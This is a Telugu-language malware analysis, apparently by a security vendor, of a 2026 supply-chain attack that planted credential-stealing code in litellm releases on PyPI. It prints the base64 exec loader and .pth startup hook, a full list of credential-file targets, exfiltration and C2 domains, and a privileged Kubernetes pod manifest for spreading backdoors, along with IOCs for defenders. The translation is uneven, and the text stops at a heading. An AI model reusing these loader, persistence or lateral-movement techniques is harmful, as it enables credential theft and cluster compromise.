వై దిస్ మ్యాటర్స్
మార్చి 24, 2026న, ప్రముఖ పైథాన్ ప్యాకేజీ లిటెల్మ్వేలాది మంది ఉపయోగించే ఒక సార్వత్రిక LLM ప్రాక్సీ గేట్వే enterpriseOpenAI, Anthropic, Google, మరియు AWS Bedrock వంటి AI ప్రొవైడర్లు మరియు అప్లికేషన్ల మధ్య ట్రాఫిక్ను మళ్లించడానికి ఉపయోగించే ఒక ప్లగిన్, PyPIలో నిశ్శబ్దంగా హ్యాక్ చేయబడింది. క్రెడెన్షియల్స్ను దొంగిలించి, క్లౌడ్ సీక్రెట్స్ను బయటకు పంపి, Kubernetes క్లస్టర్లలో అడ్డంగా వ్యాపించి, మరియు రిమోట్ కోడ్ ఎగ్జిక్యూషన్ సామర్థ్యాలతో ఒక శాశ్వత బ్యాక్డోర్ను ఇన్స్టాల్ చేసే బహుళ-దశల పేలోడ్ను కలిగి ఉన్న రెండు హానికరమైన వెర్షన్లు (1.82.7 మరియు 1.82.8) ఒకదాని తర్వాత ఒకటి 13 నిమిషాల వ్యవధిలో ప్రచురించబడ్డాయి.
సుమారుగా రోజువారీ 3.6 మిలియన్ల డౌన్లోడ్లు మరియు క్లౌడ్-నేటివ్ AI మౌలిక సదుపాయాలలో లోతైన విస్తరణతో, ఆధునిక దాడిదారులు ఆశించే అన్నింటి కూడలిలో లిటెల్మ్ ఉంది: ప్రతి ప్రధాన AI ప్రొవైడర్ కోసం API కీలు, క్లౌడ్ IAM ఆధారాలు, కుబెర్నెటెస్ సీక్రెట్లు మరియు SSH కీలు.
కానీ లిటెల్లమ్ రాజీ అనేది ఒక ఏకాంత సంఘటన కాదు. అది ఒక పరిణామం యొక్క పరాకాష్ట. ఐదు రోజుల, ఐదు పర్యావరణ వ్యవస్థల ప్రచారం ఒక ముప్పు కలిగించే వ్యక్తి ద్వారా టీమ్పీసీపీమొదట సెక్యూరిటీ స్కానర్లను (ఆక్వా ట్రివీ, చెక్మార్క్స్ KICS) విషపూరితం చేసి, ఆపై దొంగిలించబడిన వాటిని ఉపయోగించిన ప్రచారం. CI/CD npm, OpenVSX, మరియు చివరకు PyPI లలోకి వ్యాపించడానికి ఆధారాలు. సంస్థలు తమ సరఫరా గొలుసులను రక్షించుకోవడానికి ఆధారపడే సాధనాలనే దాడిదారులు ఆయుధాలుగా మార్చారు.
ఈ దాడి సరఫరా గొలుసు ముప్పు సంక్లిష్టతలో ఒక కీలకమైన మార్పును సూచిస్తుంది. అధిక విలువను చేరుకోవడానికి భద్రతా సాధనాలను దెబ్బతీసే బహుళ-దశల, క్రాస్-ఎకోసిస్టమ్ రూపకల్పన ఇందులో భాగంగా ఉంది. AI మౌలిక సదుపాయాలు, ఇది, రోజురోజుకు సర్వసాధారణం అవుతున్న దాడి సాధనాలకు అనుగుణంగా ఉండే ప్రణాళిక మరియు కార్యాచరణ పరిపక్వత స్థాయిని ప్రతిబింబిస్తుంది. పేలోడ్లను నిజ సమయంలో పునరావృతం చేశారు (సోర్స్ కోడ్లో మూడు పేలోడ్ వేరియంట్లు కనిపిస్తాయి, వీటిలో వ్యాఖ్యానించబడిన మునుపటి వెర్షన్లు కూడా ఉన్నాయి), దాడికి ఒక రోజు ముందు C2 ఇన్ఫ్రాస్ట్రక్చర్ను నమోదు చేశారు, మరియు చట్టబద్ధమైన వెండర్ ఇన్ఫ్రాస్ట్రక్చర్ను అనుకరించడానికి ఎక్స్ఫిల్ట్రేషన్ డొమైన్లను జాగ్రత్తగా ఎంచుకున్నారు. కార్డానో సైనింగ్ కీలు మరియు వైర్గార్డ్ కాన్ఫిగ్ల వంటి ప్రత్యేక లక్ష్యాలతో సహా 15కు పైగా వర్గాలను కవర్ చేసే ఈ క్రమబద్ధమైన, సమగ్రమైన క్రెడెన్షియల్ హార్వెస్టర్, AI-సహాయక మాల్వేర్ అభివృద్ధి ఒక శక్తి గుణకంగా పనిచేస్తుందనే విషయాన్ని సూచించేంతటి సంపూర్ణతను తెలియజేస్తుంది.
కాలక్రమం
| తేదీ (UTC) | ఈవెంట్ |
|---|---|
| మార్చి 19 | TeamPCP, Aqua Trivy GitHub Action ట్యాగ్లను దెబ్బతీసి, వాటి స్థానంలో హానికరమైన కోడ్ను చొప్పించి, సమాచారాన్ని బయటకు పంపిస్తుంది. CI/CD దిగువ రిపోజిటరీల నుండి రహస్యాలు |
| మార్చి 21 | ఇదే విధమైన పద్ధతులను ఉపయోగించి కాంప్రమైజ్ చెక్మార్క్స్ KICS మరియు AST గిట్హబ్ యాక్షన్లకు కూడా విస్తరిస్తుంది. |
| మార్చి 22, 06:35 | BerriAI నార్మల్ ద్వారా litellm 1.82.6 (చివరి క్లీన్ వెర్షన్)ని ప్రచురిస్తుంది CI/CD pipeline భద్రతా స్కానింగ్ కోసం ట్రివీని ఉపయోగించేది |
| మార్చి 23 | TeamPCP models.litellm.cloud (ఎక్స్ఫిల్ట్రేషన్ డొమైన్)ను నమోదు చేస్తుంది. ఇది 66కు పైగా npm ప్యాకేజీలు మరియు OpenVSX ఎక్స్టెన్షన్లను రాజీ చేస్తుంది. |
| మార్చి 24, 10:39 | litellm 1.82.7 PyPI లో ప్రచురించబడింది -- పేలోడ్ దీనిలోకి ఇంజెక్ట్ చేయబడింది proxy_server.py మాడ్యూల్ పరిధిలో. దిగుమతిపై అమలు అవుతుంది |
| మార్చి 24, 10:52 | litellm 1.82.8 13 నిమిషాల తర్వాత ప్రచురించబడింది -- జతచేస్తుంది litellm_init.pthఇది litellm ఇంపోర్ట్లకు మాత్రమే కాకుండా, ప్రతి పైథాన్ ఇంటర్ప్రెటర్ ప్రారంభంలోనూ అమలు అయ్యే ఒక పైథాన్ పాత్ కాన్ఫిగరేషన్ హుక్. ఇది వేగవంతమైన పేలోడ్ పునరావృతాన్ని చూపుతుంది. |
| మార్చి 24, ~16:00 | కమ్యూనిటీ నివేదికల తర్వాత PyPI రెండు వెర్షన్లను తొలగిస్తుంది. వెర్షన్లు ఇండెక్స్ నుండి పూర్తిగా తొలగించబడతాయి (యాంక్ చేయబడవు), అయినప్పటికీ CDN టార్బాల్లు అందుబాటులో ఉంటాయి. |
బహిర్గతమయ్యే సమయం: సుమారు 5.5 గంటలు. ఈ సమయంలో, ఏదైనా pip install litellm, pip install --upgrade litellm, లేదా CI/CD pipeline తాజా వెర్షన్ను డౌన్లోడ్ చేసి ఉంటే పేలోడ్ అమలు చేయబడి ఉండేది.
మాల్వేర్ ఎలా ప్రవేశించింది: క్యాస్కేడింగ్ కాంప్రమైజ్
litellm ప్యాకేజీ నేరుగా హ్యాక్ చేయబడలేదు. దాడి చేసిన వ్యక్తి ఒక మార్గం ద్వారా దానిని చేరుకున్నాడు. రెండు-దశల సరఫరా గొలుసు దాడి:
Aqua Trivy GitHub Action (compromised March 19) --> LiteLLM CI/CD pipeline runs Trivy without pinned version --> Malicious Trivy exfiltrates PYPI_PUBLISH token from GitHub Actions runner --> Attacker publishes poisoned litellm 1.82.7 and 1.82.8 directly to PyPI లైట్ఎల్ఎల్ఎమ్స్ CI/CD pipeline ట్రివీని సెక్యూరిటీ స్కానర్గా ఉపయోగించారు — బలహీనతలను పట్టుకోవడానికి రూపొందించిన అదే సాధనం దాడికి మార్గంగా మారింది. ఎందుకంటే pipeline పిన్ చేయబడిన ట్యాగ్కు బదులుగా మార్చగల ట్యాగ్ ద్వారా ట్రివీని సూచించారు commit SHA, రాజీపడిన చర్య స్వయంచాలకంగా అమలు చేయబడింది. హానికరమైన ట్రివీ చర్య, పర్యావరణ రహస్యాలను బయటకు పంపింది, వాటిలో ఇవి ఉన్నాయి PYPI_PUBLISH litellm PyPI ప్రాజెక్ట్కు TeamPCPకి ప్రత్యక్ష ప్రచురణ యాక్సెస్ను ఇచ్చే టోకెన్.
ఈ “రక్షణ వ్యవస్థలను దెబ్బతీయడం” వ్యూహం TeamPCP ప్రచారానికి ఒక ముఖ్య లక్షణం. మొదట భద్రతా సాధనాలను (ట్రివీ, చెక్మార్క్స్ KICS) లక్ష్యంగా చేసుకోవడం ద్వారా, దాడి చేసేవారు ఏకకాలంలో గుర్తింపును నిలిపివేసి, తదుపరి సరఫరా గొలుసులకు ప్రత్యేక అధికార ప్రాప్యతను పొందారు.
సాంకేతిక విశ్లేషణ: పేలోడ్
ఇంజెక్షన్ పాయింట్లు
వెర్షన్ 1.82.7 — మాడ్యూల్-స్థాయి అమలు litellm/proxy/proxy_server.py (లైన్ 128):
import subprocess, base64, sys, tempfile, os b64_payload = "<~12KB base64 blob>" with tempfile.TemporaryDirectory() as d: p = os.path.join(d, "p.py") with open(p, "wb") as f: f.write(base64.b64decode(b64_payload)) subprocess.run([sys.executable, p]) ఈ కోడ్ ఒక డిక్షనరీ లిటరల్ మరియు అసలైన దాని మధ్య మాడ్యూల్ స్కోప్లో ఉంటుంది. showwarning() ఫంక్షన్. ఇది వెంటనే అమలు అవుతుంది litellm.proxy.proxy_server litellm యొక్క ప్రాక్సీ ఫంక్షనాలిటీని ఉపయోగించిన ప్రతిసారీ ఇది జరుగుతుంది, దిగుమతి చేయబడుతుంది.
వెర్షన్ 1.82.8 జోడించబడింది litellm_init.pth (పైథాన్ పాత్ కాన్ఫిగరేషన్ ఫైల్):
import os, subprocess, sys; subprocess.Popen([sys.executable, "-c", "import base64; exec(base64.b64decode('...'))"], ...) పైథాన్ .pth ఫైల్లు site-packages/ ప్రతి ఇంటర్ప్రెటర్ ప్రారంభంలో ప్రాసెస్ చేయబడతాయి, కానీ దీనితో ప్రారంభమయ్యే పంక్తులు మాత్రమే import కోడ్గా అమలు చేయబడతాయి. దాడి చేసేవాడు మొత్తం పేలోడ్ను ఒకేదానికి అనుసంధానించడం ద్వారా దీనిని ఉపయోగించుకుంటాడు. import ప్రకటన: import os, subprocess, sys; subprocess.Popen(...)ఇది proxy_server.py ఇంజెక్షన్ కంటే చాలా తీవ్రమైనది — litellm ఎప్పుడూ ఇంపోర్ట్ చేయకపోయినా కూడా, ప్రతి పైథాన్ ప్రాసెస్ ప్రారంభంలో ఇది ట్రిగ్గర్ అవుతుంది. pyproject.toml పంపిణీలో ఈ ఫైల్ను చేర్చడానికి సవరించబడింది:
include = [ { path = "litellm_init.pth", format = ["sdist", "wheel"] } ] వెర్షన్ 1.82.8 ఈ విధంగా కలిగి ఉంది రెండు స్వతంత్ర అమలు మార్గాలు: proxy_server.py ఇంజెక్షన్ (litellm ప్రాక్సీ ఇంపోర్ట్పై ట్రిగ్గర్ అవుతుంది) మరియు .pth ఫైల్ (ఏదైనా పైథాన్ స్టార్టప్లో ట్రిగ్గర్ అవుతుంది). ఈ పునరావృతం అనేది గమనించదగ్గ విషయం — ఇది ఈ రెండు మార్గాలలో దేనినైనా విడిగా గుర్తించడం లేదా తొలగించడం నుండి రక్షణ కల్పిస్తుంది. 1.82.7 వెర్షన్ వచ్చిన కేవలం 13 నిమిషాల తర్వాత, ఇంపోర్ట్ సమయం నుండి స్టార్టప్ సమయానికి ఈ దాడి తీవ్రతరం కావడం, దాడి చేసిన వ్యక్తి డిప్లాయ్మెంట్ విజయాన్ని పర్యవేక్షిస్తూ, వేగంగా మార్పులు చేస్తున్నాడని సూచిస్తుంది.
దశ 1: సమగ్ర ధృవీకరణ పత్రాల సేకరణ
డీకోడ్ చేయబడిన అంతర్గత స్క్రిప్ట్ ఒక క్షుణ్ణమైన క్రెడెన్షియల్ శూన్యం. ఇది ఉపయోగిస్తుంది os.walk(), glob.glob(), subprocess.check_output()మరియు మొత్తం సిస్టమ్ను శోధించడానికి డైరెక్ట్ ఫైల్ రీడ్లు:
| వర్గం | టార్గెట్స్ |
|---|---|
| సిస్టమ్ రీకాన్ | hostname, whoami, uname -a, ip addr, printenv, ip route |
| SSH | ~/.ssh/id_rsa, id_ed25519, id_ecdsa, authorized_keys, known_hosts, configహోస్ట్ కీలు నుండి /etc/ssh/ |
| క్లౌడ్ (AWS) | ~/.aws/credentials, ~/.aws/configIMDS పాత్ర ఆధారాలు ద్వారా 169.254.169.254రహస్యాల నిర్వాహకుడు ListSecretsఎస్ఎస్ఎం DescribeParameters |
| క్లౌడ్ (GCP) | ~/.config/gcloud/ (పునరావృతమయ్యే); $GOOGLE_APPLICATION_CREDENTIALS |
| క్లౌడ్ (అజూర్) | ~/.azure/ (పునరావృత); పర్యావరణ వేరియబుల్స్ |
| Kubernetes | సేవా ఖాతా టోకెన్లు; ca.crt; నేమ్స్పేస్; kubectl get secrets --all-namespacesK8s API ద్వారా అన్ని రహస్యాలు |
| పర్యావరణ ఫైళ్లు | .env, .env.local, .env.production, .env.development, .env.staging — అంతటా పునరావృత శోధన (లోతు 6) /home, /root, /opt, /srv, /var/www, /app, /data, /tmp |
| డాకర్ | ~/.docker/config.json, /kaniko/.docker/config.json |
| ప్యాకేజీ టోకెన్లు | ~/.npmrc, ~/.vault-token, ~/.netrc |
| డేటాబేస్లు | ~/.pgpass, ~/.my.cnf, /etc/mysql/my.cnf, /etc/redis/redis.conf, మోంగోడిబి కాన్ఫిగరేషన్లు |
| TLS / SSL | నుండి ప్రైవేట్ కీలు /etc/ssl/private/, లెట్స్ ఎన్క్రిప్ట్ సర్టిఫికెట్లు, అన్నీ .pem/.key/.p12/.pfx ఫైళ్లు |
| Git | ~/.git-credentials, ~/.gitconfig |
| CI/CD | terraform.tfvars, terraform.tfstate, .gitlab-ci.yml, Jenkinsfile, ansible.cfg |
| క్రిప్టో వాలెట్లు | బిట్కాయిన్, ఎథేరియం కీస్టోర్, సోలానా కీపెయిర్లు (వాలిడేటర్, ఓట్, స్టేక్, ఫాసెట్), కార్డానో సైనింగ్ కీలు, లైట్కాయిన్, డాగ్కాయిన్, జెడ్క్యాష్, డాష్, రిపుల్, మొనెరో |
| షెల్ చరిత్ర | .bash_history, .zsh_history, .mysql_history, .psql_history, .rediscli_history |
| సిస్టమ్ ప్రామాణీకరణ | /etc/passwd, /etc/shadow, ప్రామాణీకరణ లాగ్లు (ఆమోదించబడిన SSH సెషన్లు) |
| వెబ్హుక్/API కీలు | స్లాక్ వెబ్ కోసం గ్రెప్hooksడిస్కార్డ్ వెబ్hooks, కాన్ఫిగ్ ఫైల్స్లో API కీలు/సీక్రెట్లు |
| VPN | WireGuard కాన్ఫిగరేషన్లు /etc/wireguard/ |
ఈ హార్వెస్టర్ యొక్క పరిధి సర్వవిజ్ఞాన సర్వస్వం లాంటిది. ఇది కేవలం క్లౌడ్ క్రెడెన్షియల్స్నే కాకుండా, క్రిప్టోకరెన్సీ వాలెట్లు, డేటాబేస్ పాస్వర్డ్లు, VPN కాన్ఫిగరేషన్లు మరియు మరెన్నో వాటిని లక్ష్యంగా చేసుకుంటుంది. CI/CD రహస్యాలు — దాడి చేసేవాడు రాజీపడిన సిస్టమ్ల నుండి బహుళ మార్గాల ద్వారా డబ్బు సంపాదించాలని భావిస్తున్నట్లు సూచిస్తున్నాయి.
స్టేజ్ 2: ఎన్క్రిప్టెడ్ ఎక్స్ఫిల్ట్రేషన్
దొంగిలించబడిన డేటా హైబ్రిడ్ ఎన్క్రిప్షన్ స్కీమ్ను ఉపయోగించి ఎన్క్రిప్ట్ చేయబడి, బయటకు పంపబడుతుంది:
- AES-256-CBC యాదృచ్ఛిక 32-బైట్ సెషన్ కీతో సేకరించిన మొత్తం డేటాను ఎన్కోడ్ చేయడం (ద్వారా
openssl enc) - RSA-4096 దాడి చేసేవారి ఎంబెడెడ్ పబ్లిక్ కీని ఉపయోగించి సెషన్ కీని ఎన్క్రిప్ట్ చేయడం (OAEP ప్యాడింగ్, ద్వారా
openssl pkeyutl) - రెండు సైఫర్టెక్స్ట్ ఫైల్లు ఈ విధంగా బండిల్ చేయబడ్డాయి
tpcp.tar.gz(దిtpcpప్రచారమంతటా స్థిరంగా కనిపించే — “TeamPCP” అనే ఉపసర్గ) - HTTPS POST కు
https://models.litellm.cloud/తోContent-Type: application/octet-stream
డొమైన్ models.litellm.cloud దాడికి ఒక రోజు ముందు, మార్చి 23న ఇది నమోదు చేయబడింది మరియు చట్టబద్ధమైన లిటెల్లమ్ మౌలిక సదుపాయాలతో కలిసిపోయేలా రూపొందించబడింది (అసలు ప్రాజెక్ట్ ఉపయోగిస్తుంది litellm.aiఎగ్రెస్ ట్రాఫిక్ను సమీక్షించే నెట్వర్క్-అవేర్ డిఫెండర్ కూడా, లిటెల్మ్ యొక్క సొంత మోడల్ ఎండ్పాయింట్గా కనిపించే దానికి వెళ్లే ట్రాఫిక్ను ఫ్లాగ్ చేయకపోవచ్చు.
దశ 3: శాశ్వత బ్యాక్డోర్ (sysmon.py)
పేలోడ్ సిస్టమ్ టెలిమెట్రీగా మారువేషంలో ఉన్న పోలింగ్ బ్యాక్డోర్ను ఇన్స్టాల్ చేస్తుంది:
- మార్గం:
~/.config/sysmon/sysmon.py - సర్వీస్:
sysmon.service(systemd యూజర్ యూనిట్, “సిస్టమ్ టెలిమెట్రీ సర్వీస్”గా వర్ణించబడింది) - ప్రవర్తనప్రారంభ 300-సెకన్ల నిద్ర తర్వాత, పోల్స్
https://checkmarx.zone/rawప్రతి ~50 నిమిషాలకు - అమలుC2 ద్వారా తిరిగి ఇవ్వబడిన URLను డౌన్లోడ్ చేస్తుంది
/tmp/pglog, దానిని ఎగ్జిక్యూటబుల్గా సెట్ చేస్తుంది (chmod 755), డిటాచ్డ్ సెషన్లో దీన్ని నడుపుతుంది - రాష్ట్ర ట్రాకింగ్:
/tmp/.pg_stateఅదే పేలోడ్ను మళ్లీ డౌన్లోడ్ చేయడాన్ని నివారిస్తుంది - పట్టుదల:
Restart=always,RestartSec=10క్రాష్లు మరియు రీబూట్లను తట్టుకుంటుంది
డొమైన్ checkmarx.zone ఇది చెక్మార్క్స్ (ఒక సెక్యూరిటీ కంపెనీ వద్ద) యొక్క టైపోస్క్వాట్. checkmarx.com), నెట్వర్క్ లాగ్లను సమీక్షించే SOC విశ్లేషకులు, చట్టబద్ధమైన భద్రతా విక్రేతగా కనిపించే దానికి ట్రాఫిక్ను చూసేలా ఇది రూపొందించబడింది. భద్రతా విక్రేత బ్రాండింగ్ వెనుక దాక్కోవాలనే TeamPCP యొక్క విస్తృత వ్యూహానికి అనుగుణంగా ఇది ఒక ఉద్దేశపూర్వక తప్పించుకునే పద్ధతి.
దశ 3బి: కుబెర్నెటెస్ పార్శ్వ కదలిక
హ్యాక్ చేయబడిన సిస్టమ్లో కుబెర్నెటెస్ సర్వీస్ అకౌంట్ ఆధారాలు ఉంటే, మాల్వేర్ అన్ని క్లస్టర్ నోడ్లను జాబితా చేసి, డిప్లాయ్ చేస్తుంది. ప్రత్యేక హక్కులు గల పాడ్లు ప్రతి ఒక్కరికి:
pod_manifest = { 'apiVersion': 'v1', 'kind': 'Pod', 'metadata': {'name': f'node-setup-{node_name[:35]}', 'namespace': 'kube-system'}, 'spec': { 'nodeName': node_name, 'hostPID': True, 'hostNetwork': True, 'tolerations': [{'operator': 'Exists'}], 'containers': [{ 'name': 'setup', 'image': 'alpine:latest', 'command': ['sh', '-c', drop_cmd], 'securityContext': {'privileged': True}, 'volumeMounts': [{'name': 'host', 'mountPath': '/host'}] }], 'volumes': [{'name': 'host', 'hostPath': {'path': '/'}}], 'restartPolicy': 'Never' } } ప్రతి పాడ్:
- ఇలా నడుస్తుంది విశేషాధికారం తో
hostPID,hostNetworkమరియు పూర్తి హోస్ట్ ఫైల్ సిస్టమ్ యాక్సెస్ - ఉపయోగాలు
chroot /hostఅదే ఇన్స్టాల్ చేయడానికిsysmon.pyహోస్ట్ యొక్క రూట్ ఫైల్ సిస్టమ్లో బ్యాక్డోర్ - దీనిని ఒక systemd సేవగా నమోదు చేస్తుంది, తద్వారా పాడ్ తొలగింపు తర్వాత కూడా దాని నిలకడ కొనసాగుతుంది.
- అనే
node-setup-*లోkube-systemచట్టబద్ధమైన క్లస్టర్ మౌలిక సదుపాయాలుగా కనిపించడానికి నేమ్స్పేస్
దీని అర్థం ఒంటరి రాజీపడిన CI/CD K8s యాక్సెస్ ఉన్న రన్నర్ వల్ల క్లస్టర్లోని ప్రతి నోడ్లోనూ బ్యాక్డోర్ ఉండే అవకాశం ఉంది. కుబెర్నెటిస్లో లైటెల్మ్ను ప్రాక్సీగా నడుపుతున్న సంస్థలకు ఇది ఒక విపత్కరమైన లాటరల్ మూవ్మెంట్ దృశ్యం.
పేలోడ్ పరిణామం (వ్యాఖ్యానించబడిన వేరియంట్లు)
131-132 పంక్తులలోని సోర్స్ కోడ్లో, వ్యాఖ్యానించబడిన (commented-out) రెండు మునుపటి పేలోడ్ వేరియంట్లు ఉన్నాయి, ఇవి దాడి చేసేవారి అభివృద్ధి ప్రక్రియను వెల్లడిస్తున్నాయి:
- మూడు వేరియంట్లు ఒకే బహిర్గత మౌలిక సదుపాయాలను పంచుకోండి (
models.litellm.cloud), RSA-4096 పబ్లిక్ కీ, AES-256-CBC + RSA హైబ్రిడ్ ఎన్క్రిప్షన్ వ్రాపర్, మరియుtpcp.tar.gzబండిల్ నామకరణం - మునుపటి రకాలు ఒక RC4 ఎన్క్రిప్షన్ పొర డేటా సేకరణ స్క్రిప్ట్ లోపల, బయటి AES+RSA వ్రాపర్కు ముందు సేకరించిన డేటాను ఎన్క్రిప్ట్ చేయడం జరుగుతుంది. ఈ లోపలి RC4 లేయర్ను తొలగించడం ద్వారా యాక్టివ్ పేలోడ్ (లైన్ 130) సరళీకరించబడింది.
- మునుపటి రకాలు ఉపయోగం
exec()తోStringIOయాక్టివ్ పేలోడ్ ఉపయోగిస్తున్నప్పుడు, కలెక్టర్ను ఇన్-ప్రాసెస్లో అమలు చేయడానికి క్యాప్చర్ చేయండిsubprocess.run()stdout రీడైరెక్ట్తో — హోస్ట్ ప్రాసెస్ను కలుషితం చేయకుండా ఉండే ఒక శుభ్రమైన విభజన - ఈ మూడు వేరియంట్లు ఒకే క్రెడెన్షియల్ కేటగిరీలను మరియు సేకరణ మార్గాలను లక్ష్యంగా చేసుకుంటాయి.
- మునుపటి వెర్షన్లలోని RC4 కీ అనేది, టెలిగ్రామ్లో ఆ వ్యక్తి దృష్టిని ఆకర్షించే ప్రవర్తనకు అనుగుణంగా, రెచ్చగొట్టే దూషణగా ఉండేది.
ఇది ఆపరేషన్ సమయంలో చురుకైన అభివృద్ధి జరుగుతోందని వెల్లడిస్తుంది. దాడి చేసిన వ్యక్తి సేకరణ లక్ష్యాలను మరియు సమాచార బహిష్కరణ మౌలిక సదుపాయాలను స్థిరంగా ఉంచుతూనే, ఎన్క్రిప్షన్ స్టాక్ను సరళీకరించి, ఎగ్జిక్యూషన్ ఐసోలేషన్ను మెరుగుపరిచాడు.
రాజీ సూచికలు (IOCలు)
నెట్వర్క్
| సూచిక | రకం | పర్పస్ |
|---|---|---|
models.litellm.cloud | డొమైన్ | ఎక్స్ఫిల్ట్రేషన్ ఎండ్ పాయింట్ (HTTPS POST) |
checkmarx.zone | డొమైన్ | C2 పోలింగ్ ఎండ్పాయింట్ (HTTPS GET) /raw) |
గమనిక: బాహ్య రిపోర్టింగ్ లింకులు checkmarx.zone/static/checkmarx-util-1.0.4.tgz TeamPCP క్యాంపెయిన్ యొక్క మునుపటి KICS దశకు. ఇక్కడ విశ్లేషించబడిన litellm పేలోడ్లలో ఈ URL కనుగొనబడలేదు.
ప్యాకేజీ హాష్లు
| ఫైలు | SHA256 |
|---|---|
litellm-1.82.7.tar.gz | 8a2a05fd8bdc329c8a86d2d08229d167500c01ecad06e40477c49fb0096efdea |
litellm-1.82.8.tar.gz | d39f4e7a218053cce976c91eacf184cf09a6960c731cc9d66d8e1a53406593a5 |
ఫైల్ సిస్టమ్
| సూచిక | రకం | పర్పస్ |
|---|---|---|
~/.config/sysmon/sysmon.py | ఫైలు | నిరంతర బ్యాక్డోర్ స్క్రిప్ట్ |
~/.config/systemd/user/sysmon.service | ఫైలు | సిస్టమ్డి పర్సిస్టెన్స్ యూనిట్ |
/tmp/pglog | ఫైలు | రెండవ దశ బైనరీ డౌన్లోడ్ చేయబడింది |
/tmp/.pg_state | ఫైలు | C2 స్టేట్ ట్రాకింగ్ |
litellm_init.pth in site-packages/ | ఫైలు | పైథాన్ స్టార్టప్ హుక్ (v1.82.8 మాత్రమే) |
tpcp.tar.gz | ఫైలు | ఎన్క్రిప్టెడ్ ఎక్స్ఫిల్ట్రేషన్ బండిల్ |
Kubernetes
| సూచిక | రకం | పర్పస్ |
|---|---|---|
node-setup-* పాడ్స్ లో kube-system | పోడియమ్ | ప్రత్యేక పార్శ్వ కదలిక పాడ్లు |
sysmon.service క్లస్టర్ నోడ్లపై | సర్వీస్ | పాడ్ ఎస్కేప్ ద్వారా హోస్ట్-స్థాయి నిలకడ |
క్రిప్టోగ్రాఫిక్
| సూచిక | వివరాలు |
|---|---|
| దాడి చేసినవారి RSA-4096 పబ్లిక్ కీ | SHA256 ఫింగర్ప్రింట్: bc40e5e2c438032bac4dec2ad61eedd4e7c162a8b42004774f6e4330d8137ba8మూడు పేలోడ్ వేరియంట్లలోనూ పొందుపరచబడింది; ఇతర TeamPCP ఆపరేషన్లలో కూడా ఇదే కీ నివేదించబడింది. |
tpcp కళాఖండాలలో ఉపసర్గ | బండిల్ నామకరణ విధానం (tpcp.tar.gzప్రచారం అంతటా స్థిరంగా |
సౌజన్యం: టీమ్పీసీపీ
ఈ ప్రచారం వెనుక ఉన్న ముప్పు కారకుడిని ఈ విధంగా ట్రాక్ చేస్తున్నారు టీమ్పీసీపీదీనిని PCPcat, Persy_PCP, ShellForce, మరియు DeadCatx3 అని కూడా పిలుస్తారు.
తెలిసిన లక్షణాలు:
- టెలిగ్రామ్ ఛానెల్లను నిర్వహిస్తుంది
@Persy_PCPమరియు@teampcpఅక్కడ వారు భద్రతా సంస్థలను ఎగతాళి చేశారు - బహుళ ఎకోసిస్టమ్లలో పనిచేస్తుంది (GitHub Actions, PyPI, npm, OpenVSX)
- ప్రచారంలోని ప్రతి దశకు విక్రేత-నిర్దిష్ట టైపోస్క్వాట్ డొమైన్లను ఉపయోగిస్తుంది (ఉదా,
checkmarx.zoneచెక్మార్క్స్ కోసం,models.litellm.cloudలిటెల్మ్ కోసం) - స్థిరమైన మౌలిక సదుపాయాల గుర్తులు: ఒకే RSA కీ జత,
tpcp.tar.gzనామకరణ సంప్రదాయం,tpcp-docs-*డెడ్-డ్రాప్ స్టేజింగ్గా ఉపయోగించబడే గిట్హబ్ రిపోజిటరీలు - భద్రతా సాధనాలను దిగువ సరఫరా గొలుసులకు ప్రవేశ మార్గాలుగా లక్ష్యంగా చేసుకుంటుంది
ఆపాదిత విశ్వాసంఅధికం. భాగస్వామ్య RSA పబ్లిక్ కీ, tpcp ఐదు రోజుల ప్రచారంలో ఆర్టిఫ్యాక్ట్ నామకరణం, C2 మౌలిక సదుపాయాల అతివ్యాప్తి, మరియు కార్యాచరణ వేగం అనేవి ట్రివీ, KICS, npm, OpenVSX, మరియు litellm రాజీలను ఒకే కారకుడికి బలంగా ముడిపెడుతున్నాయి.
ప్రేరణ: బహుశా ఆర్థిక (క్రిప్టో వాలెట్ దొంగతనం, క్లౌడ్ క్రెడెన్షియల్ మానిటైజేషన్) మరియు అపఖ్యాతి (టెలిగ్రామ్లో ఎగతాళి చేయడం) కలయిక కావచ్చు. AWS IAM నుండి సోలానా వాలిడేటర్ కీపెయిర్ల వరకు, వైర్గార్డ్ కాన్ఫిగ్ల వరకు క్రెడెన్షియల్ హార్వెస్టింగ్ యొక్క విస్తృతి, ప్రతి రాజీ నుండి ROIని గరిష్ఠంగా పెంచుకోవాలని చూస్తున్న ఆర్థిక ప్రేరణ కలిగిన వ్యక్తిని సూచిస్తుంది.
సాధ్యమయ్యే AI సహాయం: ఈ క్రెడెన్షియల్ హార్వెస్టర్, AI-సహాయక గణనకు అనుగుణంగా, క్రమబద్ధంగా సమగ్రంగా ఉంది — ఇందులో కార్డనో సైనింగ్ కీలు, వైర్గార్డ్ కాన్ఫిగ్లు, మరియు కనికో డాకర్ క్రెడెన్షియల్స్ వంటి ప్రత్యేక లక్ష్యాలతో సహా 15కు పైగా కేటగిరీలు ఉన్నాయి. పేలోడ్ పునరావృత వేగం (విభిన్న ఎన్క్రిప్షన్ స్కీమ్లతో మూడు వేరియంట్లు), క్రాస్-ఎకోసిస్టమ్ సమన్వయం (5 రోజుల్లో 5 ఎకోసిస్టమ్లు), మరియు ఆపరేషనల్ OPSEC (వెండర్-ఇంపర్సొనేటింగ్ డొమైన్లు, హైబ్రిడ్ ఎన్క్రిప్షన్, టెలిమెట్రీగా మారువేషంలో ఉన్న సిస్టమ్డి పర్సిస్టెన్స్) వంటివి, AI-సహాయక అభివృద్ధిని ఒక శక్తి గుణకంగా ప్రతిబింబించే స్థాయి థ్రూపుట్ను సూచిస్తున్నాయి. ఈ అంచనా ఊహాజనితమైనది; నైపుణ్యం కలిగిన ఆపరేటర్లు AI టూలింగ్ లేకుండా కూడా ఇలాంటి పరిధిని సాధించగలరు.
కొత్త TTPలు మరియు టెక్నిక్లు
1. భద్రతా సాధనాల సరఫరా గొలుసు విషపూరితం (T1195.002 వేరియంట్)
